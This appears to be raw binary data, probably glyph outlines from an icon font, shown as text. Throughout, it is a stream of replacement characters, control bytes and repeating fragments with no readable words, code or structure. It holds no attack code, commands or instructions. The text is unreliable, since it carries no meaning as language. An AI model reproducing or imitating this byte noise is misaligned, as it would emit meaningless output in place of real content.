�%%�%
S�pppppppp@%6%%6��@�-=M]ms��#32+54&+"#"&=46;#"&=463!2;26=4&+";26=4&+"';26=4&+"26=4&+"334&"%54&+";26=4&+";260		�	 	�				 		��&&&&�&&3&3�8P8&&&&���	 	P		P	 	�	 		 	-&&e&&[&&�&&�(88e&&e&&����7DQ&=4;2+"=46#"'6+"=4.'&=4;22#"./2!2+"&/�<0(0��$qY��Z�).00�vYuV


v*AB>,9!,��P8!W1/'
%>>��
�
�
p

	�����-52"&4264&"4'654.'&7>264&"�Α�Α��##")��Α��W�

			�����5G2"&465."?624'654.'&7>765.#"?62�Α�Α�#&#	
&
h##")A#	
&
��Α��K))�

			�!)����&.Ma%/&>7676#"&462&#.&264&"4'654.'&7>?626'.#"�S
�/4g��ΑT��##
)
'	

.!	S	T�Α�g.,%#�

			�						
	����%2"&4"264&"2642676&#!"3�Α�ΑU�87Q
��
Q7��Α���H66H����.<2"&4?626'.#"?626'.#"6&#!";26�Α�Α

&
	
#�

&
	

��
Q77Q��Α��6)!!w6HH����#12"&46/764.?64/&6&#!";26�Α�ΑP!!�!!PP
��
Q77Q��Α��0((	((00�6HH����!/2"&4?626'.#"&"2646&#!";26�Α�Α
&	
%Z�
��
Q77Q��Α��5						
6HH����	ALP7"&=46;%+5322+"&547#"&547#"&5#"&=46;2#46;25#�

 @
  
0		S(�(S	0		`	`�`0`�
�
� 
�
�	 		p	 		�� �000��@�#/2"'&547.=462767'5%6�hJrr�w��,!�!/	
��J4>��>4�0�?�	�(%�@�%(��
8 ��@�!+72"'&54264&"7.=462767'5%6�hJrrm""�w��,!�!/	
��J4>��>4^""I0�?�	�(%�@�%(��
8 ����� ?&7>'7'/&?6276^K�K"r/7�5��bWi!%�K�K"7/rD5K��bWh$�����	4'&6;2%2&'7632"&46&/&"?6/�?/o	
o
U
	o/?E
ʒgg�g
44&	//	=
+��+
s�g�gg�6
//
%4		4����2"&4264&"264&"�Α�Α����Α��W����!32"&42654'"&54724+"362654'"&547�Α�ΑX&4&""���4&""��Α��G&&&

�  p&&

&����*!2#!"&=463!6?654&+";26p		��		�MM0FF	 		 	[��;LL�&&���	+#76322++"&767.5#"&=463�d��				C6
�
6C		�c�$�	 	<a  a<	 	���0#!"&=463!22+2+"&=463546;265�
��

`
 %8(�

@

%�
@

`

 %@(8 
�

�
 %
	����	-9AF673&.'3'>76732#!"&5463264&+"36264&"7#&�-''-V.
'j

��%%		�		;jKKjK�-'1) )**h*#f)1
�@
%�%�`				`KjKKj�1)���?'73264&"'766'OTc!�]
];1#]$�b�!cT;]
]�'T(�b���&7'73264&"'>%'762���+
���
(�]
o9�9(5+��]�(
�		B(9�9�����$67'&4?622?'762'&?%"/7?md		Z		">>,�.q.(-�q��k�		Z		d�,>>�d		Z		">>,.q.-(q��k		Z		e�,>>����.!2#!"&=4637&=46'46'%&'p		��		

'f0
A	db+
(&+��	 		 	�
e		C�	�1N
������1!2#!"&=4637'&6?627'&6?63276+"p		��		AM(Hh�A�c++.,���	 		 	kS$4b!R21'$�����*2%//&?'#+"&546;276%3264&#-NNNN�	 		�(80$TN��`

`NNNN�P			8($6TN�@����.6J254&""'54&".546'.#"?62264&"76'.#"?62�ΑA7		.d.		7A�

%
&9((�
%
&	��gBq!�		��		�!qBgG						�&4&&4�							����#.2"&4"2642654'&"6264&">'&#"32�Α�ΑU�(**3�-F7��Α���77��6 ����!)-59%+"&5#"&5#"&5463!235#264&"75#264&"'3'#u
 8P8�8P8 

��R``L((�`�((0�PB�
o
(88((88(
 
�`��((�``�((�`����=2##"'&7#"&?6&&/&?6>76327>o
)"(
C#+M�

b:

7:&
*KJ6
E=	 8=�	�'
	%#3hG6!'����'92"&4?626'.#"6&"'&276'.#"?62�Α�Αp

&
	
#�

#n#

-�3
#	
&
��Α��F)�**6�!)����(,048<@!2+"&=4>;53#!"&54>3!23'7#?#3'#73'3'#�		�	0��7		��7	���
�
�j�
`����
gFrj	 
	   ���		
B1``�pp�``�p�``�p����A�,2"'.543267>&'&'6768'S�S''?D++D?'��!FG"%;?QQ?;%$'88'$oo==o����"%/&&?6/&6?6�%">H6 F&3
&)'H!.L	�C>"(	4949/!=	���	!)19AIQ#546;22"&42#!"&=463264&""&4622"&4&2"&462"&42"&4�
@
��(8
�
8(B//B/��Mss�``
m
8(�

�(8�/B//B3s����*5!2#!"&=46;26=4'&5463 �@(8
�@
8(C	D-+@@@8( 

 (8(2,:+ *$
�����'#"/#"&?'&6?627//�
j��j
�A	(	ARr3f&g�DD�g&���Qg��6r����#/;I2++"&=#+"&=#"&=46354+";2=4+";2'#546;2#5P	 	�	 	�����0`0 �				��h�PPPP����2"&4264&"264&"6264&"�Α�Α�C4&&4&���Α��*�&4&&4�����(048%2#!>?465762'"&546;2264&"75#75#�

���?		�K		�9O8
�	j8@@@�
�
��		�K

-��(88(�
	�_�@@�@@ �hT\7&'76?6/&"'&+""2+"'"'"'+"&=46;276;2276;2276;23$"&462�	DP(1d"dq
0

0�		:&&t&&t&&:		%JJ%�1B//B/�b9
"&
P			 	 	      	 	`/B//B����4j%2+"'"'"'+"&=46;276;2276;2276;23%"'&'5462+"&=4&"35462+"&=4&"#5#p		:&&t&&t&&:		%JJ%��
8P8	 	�8P8	 	
� 	 	      	 	 	
�(88(		

``(88(		

�
	`������ '&?66762%47#"&z	
��	
�(-6,!��2BIg


	�

	�>@4_6I&(&�-h����#22"&46/764.?64/&"7626'&�Α�ΑP!!�!!PP�RM	)�)��Α��-0((	((00�>-
-������3#"./.""&/&'&'&7>76676/676�%

	""
%2" #d
	

0)"2`>1(CS9"

�

�


"9SC(2="3	@#3����	1.7>>327/6'&2#!"&=46;7s-�G'I!`+
.#:?f		��		�I<A78;Z=L_�[�,�H	%]J��	 		 	�����/37;?W#2+"&5#+"&=4635"&=46;2346;235!355#!5#=#"&=#+3235463


`
�
`



`
�
`
` ��  �  
�
  
�
@
�
`



`
�
`



     ��    `�
  
�
  
�����$%#!"&7>;&5463232&264&"��`I<8(,<	�))$(8,����%�"2+"546;5.?4>;23'��(4@�	@4r�uW7��7Wu�PP������/7;%+32#!"&=46;5#"&?#"&?&5462+&"264#3{	�p		��		p�	^1
r(r
1V			`��
 	`		`	 
a	~~	�			�y ������"5#"'&"#"'&'&767676676'#'&7676763_'$+A
 
A+$'*$$*?#/++G0:

:0G++/#

%
$
	����(/6BJV^%'"''&7&766267&'&'767*#">"6727&'76'&'66''6'&#"#"#2"&4�7W$|$W77W$|$W�k%,� 2 `!!!!�%��K54
VV
45KK54
VV
45�	
#�
#
�%��%x####(
#
	�#
	 �`O%#"&'4.#!"#"&=46764'.=46323!2>5>32W,'
��',,
	',�
$,

,$

$,

,$���+"&462'&'.=46%2.=476`8P88P>
F|�<|E
D�P88P8��#��"�)��@�2h2767#"&'#"&547.547&5467&5463021>#"'#"&=6=4'.=46320212�%*&*(%*&*%		%(�%J�**	(.(	%
��(	**�
J%%	(��+5HY%+"&=!+"&=&=46?>;2%!'.+":>54&#"!264&#":�
 
�
 
 �"9���9
"N	
�!06

  

60!2
& 222
�!	�#/K2#!"&546;546;23546;254+";2%54+54+"#";;2=32�

�@

 	`	�	`	�pp((((@
�


0		00		0�((((������*fz��7&?6/.?6/&6?>?6/.?'/&'&?&'&?676?676767676%&>76&'&'&/&#"&>76�#
NA	2M
+= %�




	�
	
 {
�}
	
	{	 �l)

�.M
+=
NA	28+$�/4
C

4.+!	5d
	)6!+.O
����$,04<2+"&5#"&5#"&=46?>;2264&"75#;'#264&" (8	08P8�8P80	0!�
m�|((xM&��MY�((8(P	(88((88(	p"z
��((�```��((��@�Qh!2#!"&=46332'.=4&+!46;2327>=.=46;5462354626&+76&+";327P		��			2"'��%�%$4

			 		��:D;	 		 	@	 *x!..p`%%�4$
v* 	0		00		`3	kS���'%"/&4?626/&#";2=37�		�

�		�

{U
p
 `
�

�		�

�		�N6
P@6����'8@HPX`%2#"'##"&5475&546323632#0#23'"1"&46;7#264&"64&"2$"264264&"264&"�%%%�%%  %%�%%%''���&%%&��			w			��			 			@			`%6%  %%�%%  %6%A A	@%6%@b			�			 			��			 			����7AE%'&?67&?'&?6'2#!"&=46;;267!463!2!�::$$U$$::	&�&	�
=��@���;;$$$$;;�	&&	p��P��������0&4?62'%/&4?2?/&4?2?������;��:��:��,jjjjjII�jjII���!;G7"&=463546;22++"&=2#!"&5463!264&#52%"=4;2#�

	@	

	(	$	� 	5KK5Oq1����
�
		
�
		�		KjK@qOI7  �`26A6#!"&='.=4>3235#"&=46;2+325'46?"&v�	
��
F		�88		�		892��0�
+$ �

/_	0				0A?>]
+>���0%#!"&5467&546;&546;2654'6323232�#*��*#*%!/
(8%*O(**(#*%/!8(%*#���#%+"&=46;2$2"&4%#"&?62
�

�
�KjKKjK߾	_
&
_	��

�
3KjKKjk �� ������7%/+"&=&/&6?'.?>546;276� 
�	@	�
 �� 
�	@�
 �r
8O�		�O8
NN
8O�	�O8
N	����+9GUcq2#!"&546354&+"26=4&";2654&+"26=4&";2654&+"26=4&";2654&+"26=4&";26 (88(�@(88(@	@	((	@	�	P	!.!!.!	P	�	P	!.!!.!	P	�	@	((	@	�8(��(88(@(8��@		@�@@		q8		8!!�X!!X		q8		8!!�X!!X		y@		@�@@		
����+9GWes��2#!"&=46354&";26754&";26754&";26754&";262#!"&=46354&+"26754&+"26754&+"26754&+"26 (8%�%8(@(	@	�!.!	P	�!.!	P	�(	@	%8(�@(8%`	@	(�	P	!.!�	P	!.!�	@	(�8(@%%@(8�  		8!!8		8!!8		  		�% (88( %P 		 		!!		!! 		 ������(6HT\j7&>#"./&67632*#"0&'&567%.?>766676.67&'7676.'&6� ]F&
#YJ gu$$ dY�,
� SaAO6 ��,
 SF
.�"�,�+-2# $D&�'
91+
	
�)H!A`)��	�,'*(O	����.6>F3"&'.535.535.53546;23264&"6264&"6264&"�@	F\F	%@$@$@
�
@�((((((
&%,99,	2 &
1&
1 

 %&�((d((d((����15����%2+.#"#."#"&=46;546;546;232%3'#2+/+"&=&'/&?&'#"&=46;67'&?667546;276264&"'2+/+"&=&'/&?&'#"&=46;67'&?667546;276264&"p		'0&CBCLC			�
q
SJ
���3Q0	
	 	
		
	 	
((�	
	 	
		
	 	
((�	 	"""	 	P	`

h
@`@�� 	
		
	 	
		
P((4	 
		
	 	
		
P((����7;CK%2+"&547#"&547#"&=46;546;546;232%3'264&"264&"p		2B\BDB\B2		
�
q
m0
���M�((<((�	 	.BB..BB.	 	@
�

�
@�``��((((�
3K?62"&472#!"&546326/.+";2?33754&+"&#"327;26����`�	6	6	F�		**
	�55��� ��
�	�
�		$*<*	��@�#/%2++"&=#"&=46;&5462&">54(

`
 
`

-%JlJ%E,�
 
�

�
 
;5AOOA5;�"9!(����:B%#!"&5463!2;;26=326=4&+54&+"#"5!"3�

��)77)F��	0	 	0		0	 	0	��
Z	4
	7)@)7v 	p		p	 	0		0	��@����/3B$2"&454+54+";2'"!546;546;232&'5#!"&=33�xTTxT�
&


<
@7.�uP�P	������	�TxTTxB
6

L
� P001`  �*&�0	����-9EQ]iu�����2#!"&546;546;23546;23546;254+";2=4+";2=4+";254+";2=4+";2=4+";254+";2=4+";2=4+";254+";2=4+";2h

��

(		@		@
�
��((((((�((((((�((((((�((((
��

h
P		PP		PH

��((l((l((�((l((l((T((l((l((��((l((���T2#"'#"547>7&54>'./&54;2?6&'&'54&+"+"'&;265�Ԗ�j83AL92	 		2	 		�z�z329JV�%						��B�Og#"'#"54767&5462;2=>54./&54>;2?6'&'54+"+"'&#"'#"&'32654'�zV<3+.&z�f-	-	Z.+3<@hc�9HB�^)3B^�	



�
6,qO

P23����#2++"&=#"&=46;546;2`

`
@
`

`
@
@
@
�

�
@
`

`
���W]ciou}���%2#'"/+"&57&'"/&4?&'"&=46367'&4?6267'46;2762'7&'67#677&'7&'6264&"67'367'?&'�

$
/;		;/
$

$
/;		;/
$�
+Y%+
l@	L1	C
+2:%+
l@	@1	�		;/
$

$
/;		;/
$

$
/;@	11	%
L%+
�@	1w�1	%
H%+
���-T7"&=46;2#546;2+"&2?#!"&=%5!'54767546;>3232�		�		�	�		�	F4��`�`��`NN�				P				r��՗�
F��F

,		,�!2#!"&546;54&+";26��`�@`	�		�	@� @�				�52#!"&546;54&+54&+"#";;26=326��`�@`	H		H		H		H	@� @�	H		H		H		H	������Z/&='&63!22"&4>54&/&546;2?6'&'54+""+"'&;25�?R;#P��y�^^�^�-		-	gCQ9	<��''�^�^^��

	

���eoy%2+5#5#5#33#54&+"#53535####"&=46;546;546;54623546235462354623232'354&+"54&+"�		P     P	@	P     P						@		@		@				�0		8	 	`	�	��``��P		P��``��	�	p	P	p								p	P	p�00		�@		@���1?G%"/&5476;5462;2=462;2=4623226?."62"&4�	f8�8f	@ 

 

 @��00200=�
	n<<n	
��

��

�Ѐ $ <�����2D%/#"/#"&57"#"&?'&6?'&676276'7'7''77'�
bK	
lDDl
Kb
n*^""^*/$/5--5/$4!!�5S
qYYq
S5h
<k

k<
h}(2332(6**6���� �g%3#"#.'3'&'473'676327&?'&4?'&64276/>76&'&67654'&6323�(!�QM(;/)V

:)-
**

**%5:

U)/`HXWE;
)f<G+%74#A	!		!	 ��	!	
	!A5% >+G=f)������%#!"&5463!20#"/267#"'&54?<14'"'&?&''3276/764/7454&#"#'4"'&32?.547&547"'5!"3�

��)77)F��%	=N=	% 

		
 ��
Z	4
	7)@)7v &11&  #	
po	! ��@��A� .=KY%&546?626"/.=54&?6754&3766=4/&'6=4/&*����
	� ,�

��PP�``�PP�``l1PP1
OmR�66�"-$���nv~/612#".5'"&5475#"&46307'/&'&6765'&?.5467'&?7>54'&54764'6'76/�82
5P/
))
	

/P8
/<		&!M,;;,L"&	U

�~s?'$=
*!
	

		!*
AE� 	

(/(F6$	33	55	33	$6F(/(	t &&""&&���'7#!"&=4?62335335332!546;2#!"&=463�
	� 	
��@`@`@	�@	�		� 		d%		%Z������	00	`	 		 	��@�'9=L:767#!"&=72"#".'.'5463%2+5.+54635#%#5463!2#"�*+ @
�
@ �
,)"	),


�$`
 @��`
@
�& 0�

�0�
!	"
`
�
�! 
�@@` �

`&����	'2=HS^it�2#546;2#546;2#546;2#54636"&546?"&546?"&546?"&546?"&546?"&546?"&546?546;2+32#!"&=46;5#"&=46;2;546;2326�	@	�	@	�	@	�	@	} s s s s s s 	 	8(��		�`		��(8	 	
�	 	�
@	��		��		��		��	 
 .

 .

 .

 .

 .

 .

 .
Ӑ		�(8@	 		 	@8(�		�
�		�����	CP3+"&%!&5476?2+54&"#54&/#54&"#"&=463#5467�
@
C��XE++EX

 @@ 

��  @��
�C8+5

5+8C<
�
@

@H$
&H@

@
�
@!  0
�����h�'&4?6"2#".5'546326=4&"+#".5463264&+&/&6;264&#"/&47632?6#".'&66iR;;%'
#/
)K5*A$!1 &&!			 

(8%	/
q%
&'5��;)d$4
&+	d
!5K01&4& (&
$'$
�	
$	

���������$&#".'&'32#".'"'#"&463267&'#"'&&'&4>7>6767&'#".'&#"&463232>7'.5462627&5462327>32#"#"'7>"264$"264g
!	 

(

(

 	!



*#%6%:%6%#*


�			��			h	

#8-%%-8#
	

!4"%%%%%%%%"4!

'							����2"&44&'657677�Α�Α�WA��Y&s3&�+E(���Α��gCg�g)�rG"ir	"?3N,/)g����	/%+54>?#"&5%#54&"#54?54?6m	p�	mp	�`%6%`0	LL	Q	d	�L	/�	�	�`%%`�	s	KK	s����/?2#!"&546354&+";26754&+";26754&+";26���p	 		 	`	 		 	`	 		 	���`���		�		�		�		@		@		����/?%#!"&5463!2326=4&+"326=4&+"326=4&+"���`���		�		�		�		@		@		`p	 		 	`	 		 	`	 		 	����("&462'+"&46;'.?67676&6%%6%_#n�\- 1&(':!
X!@%6%%6�An1"#G!\!./
!H
����)R2#"&=46?54?03>26=4#"/.=46226=4/&67621/&�
	Zu
M		z�&/		M
u
�'?
/`
Q��M		P
�`/
?'�

P		M�
�Q����1NV%#!"&5463!2"3237232/76&#/&"'"327654#0"#"&463:1324#&5!"3�

��)77)F�;/DD/'88'u��
Z	4
	7)@)7xCC`C8N8��@���$_%"/&=#"&462322654.#"7+"=&'&?6;2654/.54>354;2'&+"�d8HVzz�z,
��xT'B'<T�	-	d
,z�zzVH8	T<'C&TxE



���$0;%"/&=#"&462322654.#"62"'&54264&"�d8HVzz�z,
��xT'B'<Tq>+CCJ
d
,z�zzVH8	T<'C&Tx�+$OO$5
�����%57#"&'&6?535#546;272#546353#"&'&67�( .
W��
��
�
 �s -
�^)!HA���  

  
���=W!H��G�;%//&?'&?67672+#"/#"&=46;2>3;........

�b X,

Q
:U�........�
0
���
0
jC
���92#"&4632#0&#"3267#"/#"&?'&6?62T	+.j��j.,
W||W�7
DD
7L""	�Ԗ
|�|�6L$$L6EE������ &),/25%+"/#"&?'&6;76232#'#3373'7#73'�5k8*8k55k8*8kB( 5p55p8.�((�.�(�Y$^^$YY$^^$!7XXX&8!!�!&8!����	'E762#547!#762'#54&#4?6'76&+'&"#";2?326F&�r�&�`-`�H''''�+���

�+�f
��`'&]z
f�((((����

(S_bek2#"&=47'3'77'#"&54'!2!';32?327654/764.+'&#1"#"2#!26='7#'73(P	�^"o��&P(8��'	88	88�	B.��(8^"  >  �P	@�4j��&%p8(��..	.

...	.

.��	.B8( 4�5555���7;?267+32++"&=!+"&=#"&=46;5#"&=3355#xP
 0		0	 	�	 	0		0 
P`�`�
`
@	 	�		��		�	 	@
`
`@@@@@������@DH%+"&=#+"&=#+"&='&'&?5'&4?5'&6?%35!5!y7	 	�	 	�	 	7Y7		w��w		7����@��/
0		00		00		0
1@2@VV@2@�@@�@���-6/#"&=46;//&?'&?676�Yf

fP-..--..y��Y
�
`.--..--����%2"&4264&"&264&#"3"&462"&4�Α�Α�P88(PppP(8S��Α���m8P8p�p8P�����@�4DL";#";#";!!&'.7>/762#!"&=463264&"����ri����p'
FF'--[%
��
%��@@@`@��
M�N	
?JJp% 

 %`����0LT\"&462#!"&5463!2";26=654??6/76/&'&5!"3"&462			�

��)77)F�B/ 	@	 �GGbbFFbb���
w			8			�	4
	7)@)7& 
		
 �++**�@8			���� #!2#!"&=46;'&?676%3p		��		�5	

))


	5��t�	 		 	JJ
		
88
		
J�������-7?G327+"&=32+"&54&"&4632>?"&=264&"264&"#!*	 	� 
	�&
(833�@8P8@			Y			&�		�`
	&
8(V'`@�(88(�@P							������7#546;2#54'#5##5#+"&=!+"&="&?63!2p0K5@5K0(000(N	 	�	 	
j@��5KK5��.������p		pp		p ��B�<%+"&54674&5463263276&'654&#"&'&54632W*/!�(8$8(,
&�5T%8(
qO#)m_.!/8(1
(8&'A$(8
Pp
F)F[����DQ%#!"&54674&454632632%&?'&4?'&676276&'&"74632.?$8(��(84%B."6&�R	L	
SS
	X))X	

	!\B1#)
;
'z
1(88(&6.B$
&
	X))X	
SS
	Y
!B\.#1$D/
������ '0:EKO7'"&?&=46&63''&4?6#76276/&>2".=7#'3'kl�MA�rQ�	=m__}LP��uj�ddd�8�.�BY1b	����z�b��WBߜŰ�����#'&4?66&='46/&5����  � ���� R
ww
e��&]

�mt�

]&���;2+'54632264&"3+"&=#+"&=.5462�	% �57			��	@	�	@	$`	 %$.�
0			Y6�		pp		�
1
������CI7&?>#"&?#!"&547>7.='&4?'&6;2+"/#77		u*x�[ #H0�

GU�Z-3<<>�
K	@�uW+*)EB<#/@
_6m
2

c	

	%����.&#"+"'&7'&54>32?547>32�3HV(	#2"(?).F�3I	X!
)#"	(VO?
��� 0@P`p�����7+".767>%+"/&67622+"&=4632+"&=463/.7676"'&'&?6#''&'&?>2+"&=4632+"&=463'62+"5'67+"5+"5�
a%*%@�		`		`		`		�		S*
�
S
*S		$
*I		`		`		`		�

@��

.+�
hh
��	@		@	�	@		@		3$�

3+.
�3	Z�	@		@	�	@		@	�����������-Ohq;#!"&546;54+";2=4+"&=46;22654/&54;2=4+"+"374+"276=4+"&57#532�
�
��

�`		,`$$y�
8
��

�
�� 	 	`x7''7�
�����DP`p#"546;2!5'&=;27;2732?>72=4+"&546;2'&+546;2"&=46;2#3"&=46;2#0	 	�$�%   
#	p&  	 	��		 		@		 		 �		�X'$@@%5N	(			%?p		�	�		�		�		�	����&.6/&/&"/&&546264&"264&"�Rt
+))+
l��qQ��	0..0	Pv�����G�'%/&?'/&='6276"&47%;Z$1Z/�/-	��1�4%��Z	1-//-$1�%4�����'/mx��������32#54#32#54;2#54;2#54#54;2!32#54!2+32#!"&=46;5#"&=46;2;546;2326=4636"&546?"&546?%".546?"&546?"&546?2"&546?"&546?"&546?"&546?� 8 � H ` �H 	8(��		�`		��(8	 	
�	 	�
	���(
C�2(
 xxxxxxxxxxxx	p(8@	 		 	@8(p		p
�		�
p	 

'

' 

'0

'

'

'

'

'

'���$,!2#!"&=4637#7>?#?/7?/�		� 		��o�8V�@@  @�    	 		 	@ �"	k�


�   @@ �   ������JR7#"'.7/.?>2+"&=#"/1"&='&54?>3235463&"&462Q#4@:!�			0
/W	 /#	\((�5e
�b"+	��		�	P/S

SV

k/	@((����>F2#+"&=#+"&="'+"&=4632546;2632>264&"E
	 	�	@	3z3	@	pPI7

#�			`\
 		 �		GG		�B^)1

	P			��A�KS&/0+"&='+"/&54?&5457+"&=4636;46;2264&"@
! 	@	�	B		4$+�K5x	G			sM

	&f-!�		�@idD)
8		8$4!5K	 			����G�43+'7'#"&=265%/&/&7%62546;2 �	�(h�<h%�	���
e	@	M��	7@�w@I	�H�

��

Z4		�����Z%#32+;2?6+".'&7#"&=46;7#"&=46;7654&+"&/&6?6;232pd"�		�	T	%O#	*		d"�		�	T	%O2*		� 	 				
.0	 	 	 				
.0	 	����!+2#"/&"#"&7676276'&"276'&"A�J2??&'&@OarJO^!		!^!		1^!		!^!		�mIWH
8&&8�P`,�)))))))������#!"&'&5476273{	�� 
"
f&@U	
	�L�&@����KOSW%+32+"&=46;5!32+"&=46;5#"&=463!5#"&=46;2+!2%35#5#!5#�	h8

�

8��8

�

8h		H

�

H	����@`�`�	(
�

�
((
�

�
(		(
�

�
(	x@��@@@@������>FN2+32+'32+";2+"&'&76=46;76;2"264267#7`
8(\7
	PK�@
	�		p

l0(pP8�
9			Mwf�
 (82n
	�P
			%*&.PpX
			W;7�2"&=4$"6265427&"�ړ�ԖP�pI�I��9�9:��R>b;SS;b>/!

**

!Z����B"&462+"&46;%2+"/#"'.?'.?'&.6?6$((�

 M

C

6
 >U
%
(
'%,G*`((��)N$	f
W2
.W
(5����
&2#"&=4&54'!2!!2#!265(P	-P(8�� P	B.��(8�P	@�&'p8(� 	.B8(������#7?G/&/&6?'.?>76'.5462+"&76"264&"264�
��
��
��
�� &TxT& ~
��
ZZ
EE
ZZ
E�:"5KK5":

�������&?6S��	
M	
=�

	�9

����G�o�'&54?>#/#+"&='"&547+"&=4?#/&?6;'&/&?637>23?632/&6?6#'&'��	

	0/=		J7R7J		=/0	

	4
NE
5	

	2=$
$
$=2	

	5
EN
s6NH(�		
Ha	N		Iw
(==(wI		N	aH
		O	P		
L44L
		P	�HN6	����@�$,4<DL!#!"&7>=46264&"264&"264&"264&"62"&4264&"�	��
	8			I			I			I			�P88P8S�:J)�1
	
�Pp�															�p�pp��%6%%6����muz$2"&4264&"2&#"#+"/+"&=&'"/&4?&'#"&=46;67'&4?6546;2354762264&"73'#�H44H4Nh
	3;$Q
	
	,	
	

	�	8f	
�oB//B/fn)kp4H44H<
3
	30	
	

	
	,	

�
�(.$

(�/B//B�``����
 (<#>32#7"&547367#'547"&%2+'72+654&+'327ZR@(\gB6jK���b�P0
*q7OP/!F*#L#�D$,P2�K5

5w�0*=)�D(`�O7*!/`��$,2+"./&"+"&5463264&"264&"`

�

:
 �

e6%%6%e6%%6%�
��
	==
@
�%6%%6%%6%%6��
� A[72#"&'&6;232>'.+"&=4635"&=463!2676&#"+".7>#2&'&6;23264&+&'�%9:+#5
 
�				N !26(	:-06D
/+H
"
t�/$,A,"

		 	 	 	
	'(.G T7.
+'
(&���'"/&4?>7&?67'�M�5Z�N#L��zZzwL#N�Z5�M�^zZz���-W62"&4$2"&4'#"'"'#"'&7&47&66266+&'&#&""#"&5467&54632632:12((�((G2$2#�8(+	<	+(8%B. 5%!/(`((((2

2#$�P8
	
8(2

.B!/!	��B�8ER_l%#!"&5467<146326326#"&"'.'&'>32#"'&?>#"'&?>#"'&?>#"'&?>^%/!�!/%8(1,�+E+T:

%2�$	%
[$	%
[$	%
[$	%
�,!//!,(8(%5#+:P
5.�@@@@@@@@���+;J2#!"&5467&54632632:62"&546762#"&546762"&54>�(88(��(8%B. 5%!/��"("�"

"�"(@8P88(2

.B!/!	�232
32
 �����
)7Ec6#"'.?>#"'.?6&#"'.?6$#"'.?6&#"'.?672#!"&5467&54632632:�@	@m@	@�@	@�@	@S@	@;(88(��(8%B. 5%!/Q
p
p
p
p
p
p
p
p
p
p�8P88(2

.B!/!	����@�EP]jw�%#!"&5467<146326321&?'&4?'&6762760"1"&7&54632#"'&?>#"'&?>#"'&?>#"'&?>�%/!�!/$8(1"��;GGK##K	% Ib&D$	%
[$	%
[$	%
[$	%
�,!//!,(8(5K##KGGP&
�@@@@@@@@������1Jc|�%'.'!'+"/&?67&'.7676326&#/&""?65'76&#/&""?65'76&#/&""?65'5!+"&=#+"&}	

	��6&

	K	+*
Q�&C��
�
�
��`	@	�	@	�
		
	Nl#	c#
	+**Q$ 





퐐		PP		���
1U]emy2+"&54327.5>7327&'.5>7&'327&'.5>676.264&"6264&"264&"7264&"	 	,>&3=1S?AW3+O-%>&3=+O-%&.T,+O-.	5!6H+O-%&.T,1N.1(A( 4$)�							I						�
�0		�
��$
E	V>		
=	t!E		
�

	(			/	


9	


/	

���!)196"&4?6766264&"62"&42"&4�	 '-9�r9D�Z�jKKjKSI			�
aZ.@>9r�9BL �^KjKKjuM			��@�	5=RYf53+"&2+"/#".='0&5#".=46;2&"&462753"&5#"&'#"&?'46;#%2+"&5�@	 	 

:)
	
		&-Y((��

�
 @`
	 	0��		Q=
8
		8+e
		�`&-`((D �`


��
��
�0		�����M%2#"&?#".576;27+76'&+76&+"#"&5467&546;2654'632324X;
D|+/!


D0!/+
&!/	(8&p�	ax
	Ao.!/"x/!.&/!8(&��@�<Z6+"&=4&'&+"&=466+"&=4&'&+"&=466+"&=4&"+"&=46S�S	 	oSf�	 	�lW�	 	B19T	 	_N5 	 		 	+�K�Q�		�V�
�e�		�t�ZtV�		�3NM8�		�JrW0�		�

�		�#9����	";T�!546;26&/&"?6/76&/&"?6/76&/&"?6/2'.=#+"&=#+"&=!26=463 ��^B�B^��

�

�

�	)) 	`	�	`	 			@@B^^,





�	@'1 +p		PP		�p		@	����/G%2#!"&=4632+"&=463!2#!"&=463'"&4632632632+"'p		��		@		�		 		��		P<TT<=++=(D.BB.<%^%P				`								�TxT--*"B\B  ���/A2"&4264&""&54754622654'54&"7"&54675462xP88P8S� TxT B\B�B/ ( `(		�8P88PH�(2<TT<1)�.BB��/!(��(!N�		���/A2"&4264&""&54754622654'54&"7"&54675462xP88P8S� TxT B\B�B/ ( `(		�8P88PH�(2<TT<1)�.BB��/!(��(!N		����+;%2#!"&=46;#"3!2=4+5!4>3!2?6/&'&`

��

@

�

 ��	@
��J�_)�
`

`
@@@@	
�K^)��@�,X�%#&'"'"'"&=46767>7>7627#&'"'"'"&=46767>7>7627#&'"'"'"&=46767>7>7622+$)l+)l+)
!
X

Y
!+$)l+)l+#,
!
X

Y
!+$)l+)l+#,
!
X

Y
@	 
	 				�	 	 				�	 	 				������%="&462#"/&4?7#"'.?'6#5&/.>2?6�B//B/�


0	.=u.	0


�)�) )'b') /B//B��'
!
@9339@
!
' � 

 		���2:B!46762+"&547"'"&54>7&5!5463264&" 4&"2�o�0+!h		0<"/B/!F!/B/<�&��`��6`"
\	 	@K8+!//!
		
!//!!8K@&������B�
 go"&'62&.'632767632&7'&'&'&''&4767>.&76767&547632>54'&6264&" 	'V'	�%,5�4,$k6+`2+=66>+2`+6
)F2!7 )
�((P

��P/C**C/P� =	Xb	  bX= ?13H!8"0@�((��� 4I7&=46;22654.'&=467+"&5.'.=46+"&5.'".=46�:D
	<)Ej
0
(	0z�	 	�a	
Sv	 	S9
�d=)<	WD�

�
2��z
	a�	 	`vS
:R 
����	7!#!"&7;26=4&+"%2!546;546;23546;2���@	`		`	P�@0	 	�	 	���`		`		�000		00		0����	7!#!"&73!26=4&#!"%2!546;546;23546;2���@	 		��	P�@0	 	�	 	���@		@		�000		00		0�����")-15;C#"/&67%>'&#"#"/&6?63267'7'?'?'77&'67'�)6��
 a				!%,.O��=�<�<Q	-
$=d9w!�6�718>=��'''�.
	�	�����*'&&'&7276/>76/&67*."'f91��3
7S�DX!"&#b.&291B		
28 &"!XD
�����+;K[_o���%#!"&=4?>;5#"&=463!2+32;26=4&+"";26=4&#'#";26=4&'35#26=4&+"3;26=4&+"54+";2754&+";26754&+";26�	�@
U`				`��				 				0				���(				 				���				0				E[	
[�@	`		`	@				G				P				� �				@				�x				W				���+@V72/"/&4?'&637"&=46762#/&=46;26+"&?'&4?62�
c
c!�
c
c!cc
p��
p!c
c�
p!c
c@
p!c
c�c
c!p
p
c
c����B�C#'32%#73#5"&?6;2++"&=!+"&='#"&=46;'!0ac	��~�~��	c�			 	��	 			 �`������`�@	 	�				�	 	  ������	%?N^#53##7/32210'&/&"&?6;#+"&='#"&=46;'%"&54676>'&'&'32�=d�~!c
�'	c�51�	 			%4^�^D4('?3&X���H
